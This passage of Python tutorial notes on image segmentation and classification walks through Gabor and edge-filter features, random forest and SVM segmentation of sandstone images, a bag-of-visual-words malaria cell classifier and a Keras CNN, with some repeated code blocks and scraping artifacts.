    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1  # Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # Feature 4 is Roberts edge
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # Feature 5 is Sobel
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # Feature 6 is Scharr
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # Feature 7 is Prewitt
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # Feature 8 is Gaussian with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # Feature 9 is Gaussian with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # Feature 10 is Median with size=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # Feature 11 is Variance with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1  # Add column to original dataframe

    return df
import glob
import pickle
from matplotlib import pyplot as plt

filename = "sandstone_model"
loaded_model = pickle.load(open(filename, 'rb'))

path = "images/Train_images/*.tif"
for file in glob.glob(path):
    print(file)  # just stop here to see all file names printed
    img = cv2.imread(file, 0)
    # Call the feature extraction function.
    X = feature_extraction(img)
    result = loaded_model.predict(X)
    segmented = result.reshape((img.shape))

    name = file.split("e_")
    cv2.imwrite('images/Segmented/' + name[1], segmented)
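Because segmented holds raw class labels, the TIFFs written above look nearly black in an ordinary viewer. For a human-checkable preview, an extra line inside the loop could save a colour-mapped copy, as plt.imsave was used earlier (a sketch; the preview path is hypothetical):

# Hypothetical extra line for the loop body above
plt.imsave('images/Segmented/preview_' + name[1].replace('.tif', '.png'), segmented, cmap='jet')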

                      jpg

                      67b - Feature based image segmentation using traditional machine learning. -Multi-training images-

This video summarizes all the steps of image classification with traditional machine-learning methods.

We use a random forest or a support vector machine, both traditional machine-learning methods. I believe these can be far better than deep learning here, because for most applications you simply do not have the kind of data deep learning requires; with limited training data, traditional machine learning often works well and can in fact outperform deep learning.

                      import numpy as np
                      import cv2
                      import pandas as pd
                      import pickle
                      from matplotlib import pyplot as plt
                      import os
                      • STEP 1: READ TRAINING IMAGES AND EXTRACT FEATURES
image_dataset = pd.DataFrame()  # Dataframe to capture image features

img_path = "images/train_images/"
for image in os.listdir(img_path):  # iterate through each file
    print(image)

    df = pd.DataFrame()  # Temporary data frame to capture information for each loop.
    # Reset dataframe to blank after each loop.

    input_img = cv2.imread(img_path + image)  # Read images

    # Check if the input image is RGB or grey and convert to grey if RGB
    if input_img.ndim == 3 and input_img.shape[-1] == 3:
        img = cv2.cvtColor(input_img, cv2.COLOR_BGR2GRAY)
    elif input_img.ndim == 2:
        img = input_img
    else:
        raise Exception("The module works only with grayscale and RGB images!")

    ################################################################
    # START ADDING DATA TO THE DATAFRAME

    # Add pixel values to the data frame
    pixel_values = img.reshape(-1)
    df['Pixel_Value'] = pixel_values  # Pixel value itself as a feature
    df['Image_Name'] = image  # Capture image name as we read multiple images

    ############################################################################
    # Generate Gabor features
    num = 1  # To count numbers up in order to give Gabor features a label in the data frame
    kernels = []
    for theta in range(2):  # Define number of thetas
        theta = theta / 4. * np.pi
        for sigma in (1, 3):  # Sigma with 1 and 3
            for lamda in np.arange(0, np.pi, np.pi / 4):  # Range of wavelengths
                for gamma in (0.05, 0.5):  # Gamma values of 0.05 and 0.5
                    gabor_label = 'Gabor' + str(num)  # Label Gabor columns as Gabor1, Gabor2, etc.
                    ksize = 9
                    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                    kernels.append(kernel)
                    # Now filter the image and add values to a new column
                    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                    filtered_img = fimg.reshape(-1)
                    df[gabor_label] = filtered_img  # Labels columns as Gabor1, Gabor2, etc.
                    print(gabor_label, ': theta=', theta, ': sigma=', sigma, ': lamda=', lamda, ': gamma=', gamma)
                    num += 1  # Increment for gabor column label
    ########################################
    # Generate OTHER FEATURES and add them to the data frame

    # CANNY EDGE
    edges = cv2.Canny(img, 100, 200)  # Image, min and max values
    edges1 = edges.reshape(-1)
    df['Canny Edge'] = edges1  # Add column to original dataframe

    from skimage.filters import roberts, sobel, scharr, prewitt

    # ROBERTS EDGE
    edge_roberts = roberts(img)
    edge_roberts1 = edge_roberts.reshape(-1)
    df['Roberts'] = edge_roberts1

    # SOBEL
    edge_sobel = sobel(img)
    edge_sobel1 = edge_sobel.reshape(-1)
    df['Sobel'] = edge_sobel1

    # SCHARR
    edge_scharr = scharr(img)
    edge_scharr1 = edge_scharr.reshape(-1)
    df['Scharr'] = edge_scharr1

    # PREWITT
    edge_prewitt = prewitt(img)
    edge_prewitt1 = edge_prewitt.reshape(-1)
    df['Prewitt'] = edge_prewitt1

    # GAUSSIAN with sigma=3
    from scipy import ndimage as nd
    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian_img1 = gaussian_img.reshape(-1)
    df['Gaussian s3'] = gaussian_img1

    # GAUSSIAN with sigma=7
    gaussian_img2 = nd.gaussian_filter(img, sigma=7)
    gaussian_img3 = gaussian_img2.reshape(-1)
    df['Gaussian s7'] = gaussian_img3

    # MEDIAN with size=3
    median_img = nd.median_filter(img, size=3)
    median_img1 = median_img.reshape(-1)
    df['Median s3'] = median_img1

    # VARIANCE with size=3
    variance_img = nd.generic_filter(img, np.var, size=3)
    variance_img1 = variance_img.reshape(-1)
    df['Variance s3'] = variance_img1  # Add column to original dataframe

    ######################################
    # Update dataframe for images to include details for each image in the loop
    image_dataset = pd.concat([image_dataset, df])  # DataFrame.append was removed in pandas 2.0
                      • STEP 2: READ LABELED IMAGES (MASKS) AND CREATE ANOTHER DATAFRAME WITH LABEL VALUES AND LABEL FILE NAMES
mask_dataset = pd.DataFrame()  # Create dataframe to capture mask info.

mask_path = "images/train_masks/"
for mask in os.listdir(mask_path):  # iterate through each file to perform some action
    print(mask)

    df2 = pd.DataFrame()  # Temporary dataframe to capture info for each mask in the loop
    input_mask = cv2.imread(mask_path + mask)

    # Check if the input mask is RGB or grey and convert to grey if RGB
    if input_mask.ndim == 3 and input_mask.shape[-1] == 3:
        label = cv2.cvtColor(input_mask, cv2.COLOR_BGR2GRAY)
    elif input_mask.ndim == 2:
        label = input_mask
    else:
        raise Exception("The module works only with grayscale and RGB images!")

    # Add pixel values to the data frame
    label_values = label.reshape(-1)
    df2['Label_Value'] = label_values
    df2['Mask_Name'] = mask

    mask_dataset = pd.concat([mask_dataset, df2])  # Update mask dataframe with all the info from each mask
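A quick sanity check before combining the two dataframes: every feature row needs exactly one label row (a sketch):

print(image_dataset.shape, mask_dataset.shape)
assert len(image_dataset) == len(mask_dataset), "images and masks must cover the same number of pixels"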
                      • STEP 3: GET DATA READY FOR RANDOM FOREST (or other classifier) COMBINE BOTH DATAFRAMES INTO A SINGLE DATASET
                      dataset = pd.concat([image_dataset, mask_dataset], axis=1)  # Concatenate both image and mask datasets

                      # If you expect image and mask names to be the same this is where we can perform sanity check
                      # dataset['Image_Name'].equals(dataset['Mask_Name'])
                      # If we do not want to include pixels with value 0
                      # e.g. Sometimes unlabeled pixels may be given a value 0.
                      dataset = dataset[dataset.Label_Value != 0]

                      # Assign training features to X and labels to Y
                      # Drop columns that are not relevant for training (non-features)
                      X = dataset.drop(labels = ["Image_Name", "Mask_Name", "Label_Value"], axis=1)

                      # Assign label values to Y (our prediction)
                      Y = dataset["Label_Value"].values

                      # Split data into train and test to verify accuracy after fitting the model.
                      from sklearn.model_selection import train_test_split
                      X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=20)
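One caveat: a random pixel-level split lets pixels from the same image land in both train and test, and because neighbouring pixels are strongly correlated this inflates the test accuracy. A group-aware split by image name avoids that (a sketch using sklearn's GroupShuffleSplit with the variables above):

from sklearn.model_selection import GroupShuffleSplit

# Keep all pixels of an image on the same side of the split
gss = GroupShuffleSplit(n_splits=1, test_size=0.2, random_state=20)
train_idx, test_idx = next(gss.split(X, Y, groups=dataset["Image_Name"].values))
X_train, X_test = X.iloc[train_idx], X.iloc[test_idx]
y_train, y_test = Y[train_idx], Y[test_idx]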
                      • STEP 4: Define the classifier and fit a model with our training data
                      # Import training classifier
                      from sklearn.ensemble import RandomForestClassifier
                      # Instantiate model with n number of decision trees
                      model = RandomForestClassifier(n_estimators = 50, random_state = 42)

                      # Train the model on training data
                      model.fit(X_train, y_train)
                      • STEP 5: Accuracy check
                      from sklearn import metrics

                      prediction_test = model.predict(X_test)
                      # Check accuracy on test dataset.
                      print("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
                      • STEP 6: SAVE MODEL FOR FUTURE USE
# You can store the model for future use. In fact, this is how you do machine learning:
                      # Train on training images, validate on test images and deploy the model on unknown images.
                      # Save the trained model as pickle string to disk for future use
                      model_name = "sandstone_model"
                      pickle.dump(model, open(model_name, 'wb'))

                      shape_fit_: tuple of int of shape (n_dimensions_of_X,)
                      Array dimensions of training vector X.

                      68b - SVM vs. Random Forest for image segmentation

                      import numpy as np
                      import cv2
                      import pandas as pd

                      img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif')
                      img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
                      img2 = img.reshape(-1)
                      df = pd.DataFrame()
                      df['Original Image'] = img2

# Generate Gabor features
num = 1
kernels = []
for theta in range(2):
    theta = theta / 4. * np.pi
    for sigma in (1, 3):
        for lamda in np.arange(0, np.pi, np.pi / 4):
            for gamma in (0.05, 0.5):
                gabor_label = 'Gabor' + str(num)
                ksize = 9
                kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                kernels.append(kernel)
                fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                filtered_img = fimg.reshape(-1)
                df[gabor_label] = filtered_img
                num += 1
                      # CANNY EDGE
                      edges = cv2.Canny(img, 100,200)
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1

                      from skimage.filters import roberts, sobel, scharr, prewitt

                      # ROBERTS EDGE
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # SOBEL
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # SCHARR
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # PREWITT
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # GAUSSIAN with sigma=3
                      from scipy import ndimage as nd

                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # GAUSSIAN with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # MEDIAN with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # VARIANCE with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1

                      ######################################

                      # Now, add a column in the data frame for the Labels
                      # For this, we need to import the labeled image
                      labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif')
                      # Remember that you can load an image with partial labels
                      # But, drop the rows with unlabeled data

                      labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_BGR2GRAY)
                      labeled_img1 = labeled_img.reshape(-1)
                      df['Labels'] = labeled_img1

                      #########################################################

                      # Define the dependent variable that needs to be predicted (labels)
                      Y = df["Labels"].values

                      # Define the independent variables
                      X = df.drop(labels = ["Labels"], axis=1)

                      # Split data into train and test to verify accuracy after fitting the model.
                      from sklearn.model_selection import train_test_split
                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      from sklearn.svm import LinearSVC

                      model = LinearSVC(max_iter=100)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
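Note that LinearSVC with max_iter=100 will almost certainly stop before converging on raw 0-255 features. Scaling the features and raising the iteration cap usually helps (a sketch with sklearn's StandardScaler in a pipeline; not part of the original video):

from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVC

# Standardize each feature column, then fit the linear SVM
svm_model = make_pipeline(StandardScaler(), LinearSVC(max_iter=10000))
svm_model.fit(X_train, Y_train)
print('Accuracy =', svm_model.score(X_test, Y_test))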
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # SOBEL
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # SCHARR
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # PREWITT
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # GAUSSIAN with sigma=3
                      from scipy import ndimage as nd

                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # GAUSSIAN with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # MEDIAN with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # VARIANCE with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1

                      ######################################

                      # Now, add a column in the data frame for the Labels
                      # For this, we need to import the labeled image
                      labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif')
                      # Remember that you can load an image with partial labels
                      # But, drop the rows with unlabeled data

                      labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_BGR2GRAY)
                      labeled_img1 = labeled_img.reshape(-1)
                      df['Labels'] = labeled_img1

                      #########################################################

                      # Define the dependent variable that needs to be predicted (labels)
                      Y = df["Labels"].values

                      # Define the independent variables
                      X = df.drop(labels = ["Labels"], axis=1)

                      # Split data into train and test to verify accuracy after fitting the model.
                      from sklearn.model_selection import train_test_split
                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      +
                      1
                      2
                      3
                      4
                      5
                      from sklearn.svm import LinearSVC

                      model = LinearSVC(max_iter=100)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\svm\_base.py:1225: ConvergenceWarning: Liblinear failed to converge, increase the number of iterations.
                         warnings.warn(
                       

SVM is much slower than Random Forest.
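To make that concrete, the two classifiers can be timed on the same split. A minimal sketch, assuming the X_train/Y_train split from above (the n_estimators value is just an illustrative choice):

import time
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import LinearSVC

# Fit both models on the same data and compare wall-clock fit times
for name, est in [("LinearSVC", LinearSVC(max_iter=100)),
                  ("RandomForest", RandomForestClassifier(n_estimators=10))]:
    t0 = time.perf_counter()
    est.fit(X_train, Y_train)
    print(name, "fit time: %.1f s" % (time.perf_counter() - t0))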

from sklearn import metrics

print("Accuracy=", metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy= 0.9525666606203519
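
Overall accuracy can hide weak classes in a multi-phase segmentation; scikit-learn gives a quick per-label breakdown. A minimal sketch, assuming Y_test and prediction_test from above:

from sklearn.metrics import classification_report

# Precision/recall/F1 for each label value in the mask
print(classification_report(Y_test, prediction_test))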
                       
# You can store the model for future use. In fact, this is how you do machine learning:
# train on training images, validate on test images and deploy the model on unknown images.
# Save the trained model

import pickle

# Save the trained model as a pickle string to disk for future use
filename = "sandstone_model"
pickle.dump(model, open(filename, 'wb'))

# To test the model on future datasets
loaded_model = pickle.load(open(filename, 'rb'))
result = loaded_model.predict(X)

# Display the segmentation result as an image
segmented = result.reshape((img.shape))

from matplotlib import pyplot as plt

plt.imshow(segmented, cmap='jet')
plt.imsave('segmented_rock_RF_100_estim.jpg', segmented, cmap='jet')

                      png

This doesn't mean SVMs are useless; the point is that for pixel segmentation an SVM may not be the right choice, whereas for image classification SVMs actually do quite well.

DIP-Python tutorials for image processing and machine learning (69) - BOVW

                      https://www.kaggle.com/datasets/iarunava/cell-images-for-detecting-malaria?resource=download

                      Train_BOVW

import cv2
import numpy as np
import os
• Get the training class names and store them in a list
• Here we use folder names as class names
train_path = 'images/cell_images/train'  # Folder Names are Parasitized and Uninfected
training_names = os.listdir(train_path)
• Get the path to all images and save them in a list
• Store the paths in image_paths and the corresponding labels in image_classes
image_paths = []
image_classes = []
class_id = 0
                      • To make it easy to list all file names in a directory let us define a function
def imglist(path):
    return [os.path.join(path, f) for f in os.listdir(path)]
                      • Fill the placeholder empty lists with image path, classes, and add class ID number

for training_name in training_names:
    dir = os.path.join(train_path, training_name)
    class_path = imglist(dir)
    image_paths += class_path
    image_classes += [class_id] * len(class_path)
    class_id += 1

image_paths
                      ['images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_87.png',
                        'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133111a_cell_88.png',
                        'images/cell_images/train\\Parasitized\\C37BP2_thinF_IMG_20150620_133205a_cell_87.png',

• Two classes in total: Parasitized and Uninfected
image_classes
                      [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
                       
class_id
                      2
                       

des_list = []

OpenCV scale-invariant feature detection: SIFT, SURF, BRISK, ORB

• BRISK is a good replacement for SIFT. ORB also works but didn't work well for this example

brisk = cv2.BRISK_create(30)
for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))
                  • Stack all the descriptors vertically in a numpy array

descriptors = des_list[0][1]
for image_path, descriptor in des_list[1:]:
    descriptors = np.vstack((descriptors, descriptor))
descriptors
                  array([[244, 255, 223, ...,   0,  17,  48],
                          [254, 191, 247, ...,   8,  25,   0],
                          [240, 255, 255, ..., 137,  25,   0],

                  • kmeans works only on float, so convert integers to float
descriptors_float = descriptors.astype(float)
                  • Perform k-means clustering and vector quantization

k-means is used here; SVM or Random Forest could also be used.

from scipy.cluster.vq import kmeans, vq

k = 200  # k-means with 100 clusters gives lower accuracy for the aeroplane example
voc, variance = kmeans(descriptors_float, k, 1)
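
For large descriptor sets, scipy's kmeans can get slow; scikit-learn's MiniBatchKMeans is a common faster substitute for building the vocabulary. A hedged sketch (voc_alt is a hypothetical replacement for the voc codebook above):

from sklearn.cluster import MiniBatchKMeans

# Cluster centers play the same role as the `voc` codebook above
mbk = MiniBatchKMeans(n_clusters=200, random_state=0).fit(descriptors_float)
voc_alt = mbk.cluster_centers_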
• Calculate the histogram of features and represent them as a vector

im_features = np.zeros((len(image_paths), k), "float32")
for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1], voc)
    for w in words:
        im_features[i][w] += 1

words
                    array([ 48,  14,  24,  50,  86, 177, 199,  91,  24,  15,  21,  44,  86,
                            192,  71,  46, 193,  59, 154,   2,  80, 119,  43])
                     
distance
                    array([ 79.62537284,  76.25693411, 150.61976132,   0.        ,
                            189.20699172, 167.46438427,   0.        , 132.3697473 ,
                             95.40341975, 137.6727198 , 113.90895487, 104.85068749,
                    @@ -555,7 +553,7 @@ 

                    Train_BOVW

• Perform Tf-Idf vectorization
nbr_occurences = np.sum((im_features > 0) * 1, axis=0)
idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')
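
Note that idf is computed here but never multiplied into im_features later in the script, so the features remain raw word counts. If you wanted the weighting actually applied, a one-line sketch (an assumption, not part of the original flow):

im_features = im_features * idf  # apply the Tf-Idf weights before scaling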
• Scale the word histograms: standardize features by removing the mean and scaling to unit variance (a form of normalization)

from sklearn.preprocessing import StandardScaler
stdSlr = StandardScaler().fit(im_features)
im_features = stdSlr.transform(im_features)
                    • Train an algorithm to discriminate vectors corresponding to positive and negative training images
                    • Train the Linear SVM
from sklearn.svm import LinearSVC
clf = LinearSVC(max_iter=10000)  # The default of 1000 is not converging
clf.fit(im_features, np.array(image_classes))
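
With such a small training set, a cross-validated score is a cheap sanity check before saving the classifier. A minimal sketch, assuming im_features and image_classes from above:

from sklearn.model_selection import cross_val_score

# 5-fold CV on the scaled histogram features
scores = cross_val_score(LinearSVC(max_iter=10000), im_features, np.array(image_classes), cv=5)
print("CV accuracy: %.2f +/- %.2f" % (scores.mean(), scores.std()))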
• Save the SVM
• Joblib dumps the Python objects into one file

import joblib
joblib.dump((clf, training_names, stdSlr, k, voc), "bovw.pkl", compress=3)
                  ['bovw.pkl']
                   

                  Validate_BOVW

import cv2
import numpy as np
import os
import pylab as pl
from sklearn.metrics import confusion_matrix, accuracy_score # sreeni
import joblib
                  • Load the classifier, class names, scaler, number of clusters and vocabulary from stored pickle file (generated during training)

clf, classes_names, stdSlr, k, voc = joblib.load("bovw.pkl")
• If you use the train set here instead of test, you get great accuracy (as expected)

test_path = 'images/cell_images/test'
testing_names = os.listdir(test_path)

# Get path to all images and save them in a list
# image_paths and the corresponding label in image_classes
image_paths = []
image_classes = []
class_id = 0

# To make it easy to list all file names in a directory let us define a function

def imglist(path):
    return [os.path.join(path, f) for f in os.listdir(path)]

# Fill the placeholder empty lists with image path, classes, and add class ID number

for testing_name in testing_names:
    dir = os.path.join(test_path, testing_name)
    class_path = imglist(dir)
    image_paths += class_path
    image_classes += [class_id] * len(class_path)
    class_id += 1

# Create feature extraction and keypoint detector objects
# SIFT is not available anymore in openCV
# Create a list where all the descriptors will be stored
des_list = []

# BRISK is a good replacement for SIFT. ORB also works but didn't work well for this example
brisk = cv2.BRISK_create(30)

for image_path in image_paths:
    im = cv2.imread(image_path)
    kpts, des = brisk.detectAndCompute(im, None)
    des_list.append((image_path, des))

# Stack all the descriptors vertically in a numpy array
# (des_list[1:] avoids stacking the first descriptor twice)
descriptors = des_list[0][1]
for image_path, descriptor in des_list[1:]:
    descriptors = np.vstack((descriptors, descriptor))

# Calculate the histogram of features
# vq assigns codes from a code book to observations
from scipy.cluster.vq import vq
test_features = np.zeros((len(image_paths), k), "float32")
for i in range(len(image_paths)):
    words, distance = vq(des_list[i][1], voc)
    for w in words:
        test_features[i][w] += 1

# Perform Tf-Idf vectorization
nbr_occurences = np.sum((test_features > 0) * 1, axis=0)
idf = np.array(np.log((1.0 * len(image_paths) + 1) / (1.0 * nbr_occurences + 1)), 'float32')

# Scale the features
# Standardize features by removing the mean and scaling to unit variance
# Scaler (stdSlr comes from the pickled file we imported)
test_features = stdSlr.transform(test_features)
• Up to here, most of the above code is the same as in Train, except for the k-means clustering step

true_class = [classes_names[i] for i in image_classes]
              • Perform the predictions and report predicted class names.

predictions = [classes_names[i] for i in clf.predict(test_features)]
              • Print the true class and Predictions
print("true_class =" + str(true_class))
print("prediction =" + str(predictions))
              true_class =['Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
               prediction =['Parasitized', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Parasitized', 'Uninfected', 'Parasitized', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected', 'Uninfected']
               
              • To make it easy to understand the accuracy let us print the confusion matrix
def showconfusionmatrix(cm):
    pl.matshow(cm)
    pl.title('Confusion matrix')
    pl.colorbar()
    pl.show()

accuracy = accuracy_score(true_class, predictions)
print("accuracy = ", accuracy)
cm = confusion_matrix(true_class, predictions)
print(cm)
              accuracy =  0.7
               [[5 5]
                [1 9]]
               
showconfusionmatrix(cm)
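
Recent scikit-learn versions also ship a ready-made confusion-matrix plot, which avoids the hand-rolled helper above. A sketch, assuming true_class and predictions from above:

from sklearn.metrics import ConfusionMatrixDisplay

# Labeled axes come for free, unlike the pl.matshow version
ConfusionMatrixDisplay.from_predictions(true_class, predictions)
pl.show()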


              png

DIP-Python tutorials for image processing and machine learning (70-71) - Deep Learning

              png

There can be many convolutional and pooling layers.

              png

INPUT_SHAPE = (64, 64, 3)  # change to (SIZE, SIZE, 3)
inp = keras.layers.Input(shape=INPUT_SHAPE)
conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(inp)
pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
drop1 = keras.layers.Dropout(rate=0.2)(norm1)
conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(drop1)
pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
drop2 = keras.layers.Dropout(rate=0.2)(norm2)
flat = keras.layers.Flatten()(drop2)
hidden1 = keras.layers.Dense(512, activation='relu')(flat)
norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
drop3 = keras.layers.Dropout(rate=0.2)(norm3)
hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
drop4 = keras.layers.Dropout(rate=0.2)(norm4)

out = keras.layers.Dense(2, activation='sigmoid')(drop4)  # units=1 gives error
model = keras.Model(inputs=inp, outputs=out)
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

              A few keywords to understand:

              • Tensorflow

import numpy as np
import cv2
import os
from PIL import Image
import keras

np.random.seed(1000)
os.environ['KERAS_BACKEND'] = 'tensorflow'  # Set the backend to tensorflow (could also be theano if you prefer)

• Import the input images (500 uninfected cells, 500 parasitized cells)
image_directory = 'cell_images2/'
SIZE = 64
dataset = []
label = []
• Import the parasitized cells and label them 0
parasitized_images = os.listdir(image_directory + 'Parasitized/')
for i, image_name in enumerate(parasitized_images):
    if image_name.split('.')[1] == 'png':  # Only read PNG files
        image = cv2.imread(image_directory + 'Parasitized/' + image_name)  # Read the image as an np.array
        image = Image.fromarray(image, 'RGB')  # Convert the array to a PIL Image
        image = image.resize((SIZE, SIZE))  # Resize
        dataset.append(np.array(image))  # Add to the dataset
        label.append(0)  # Add the label
• Import the uninfected cells and label them 1
uninfected_images = os.listdir(image_directory + 'Uninfected/')
for i, image_name in enumerate(uninfected_images):
    if image_name.split('.')[1] == 'png':
        image = cv2.imread(image_directory + 'Uninfected/' + image_name)
        image = Image.fromarray(image, 'RGB')
        image = image.resize((SIZE, SIZE))
        dataset.append(np.array(image))
        label.append(1)
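
Since dataset and label are plain Python lists, every later fit/evaluate call wraps them in np.array(...). A small optional simplification (an assumption, not in the original script) is to convert once here:

dataset = np.array(dataset)  # shape: (n_images, SIZE, SIZE, 3)
label = np.array(label)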


INPUT_SHAPE = (SIZE, SIZE, 3)
inp = keras.layers.Input(shape=INPUT_SHAPE)
conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3),
                            activation='relu', padding='same')(inp)
pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
                  • Normalization 1

See the CSDN blog post “神经网络 BN 层 batch normalization 参数计算” by bblingbbling for how BatchNormalization parameters are counted.

norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
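
As a quick check of the parameter math from that post: BatchNormalization keeps four vectors per normalized channel (gamma, beta, moving mean, moving variance), so normalizing 32 channels costs 32 × 4 = 128 parameters, of which only gamma and beta (64) are trainable. A standalone sketch to verify:

x = keras.layers.Input(shape=(32, 32, 32))
m = keras.Model(x, keras.layers.BatchNormalization(axis=-1)(x))
m.summary()  # the BN layer reports 128 params (64 trainable, 64 non-trainable)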
drop1 = keras.layers.Dropout(rate=0.2)(norm1)
• Convolutional layer 2
conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3),
                            activation='relu', padding='same')(drop1)
• Pooling layer 2
pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
                  • Normalization 2
norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
                  • Dropout 2
drop2 = keras.layers.Dropout(rate=0.2)(norm2)
• Flatten layer

flat = keras.layers.Flatten()(drop2)
hidden1 = keras.layers.Dense(512, activation='relu')(flat)
                      • Normalization 3
norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
                      • Dropout 3
drop3 = keras.layers.Dropout(rate=0.2)(norm3)
• Hidden layer 2
hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
                      • Normalization 4
norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
• Dropout 4
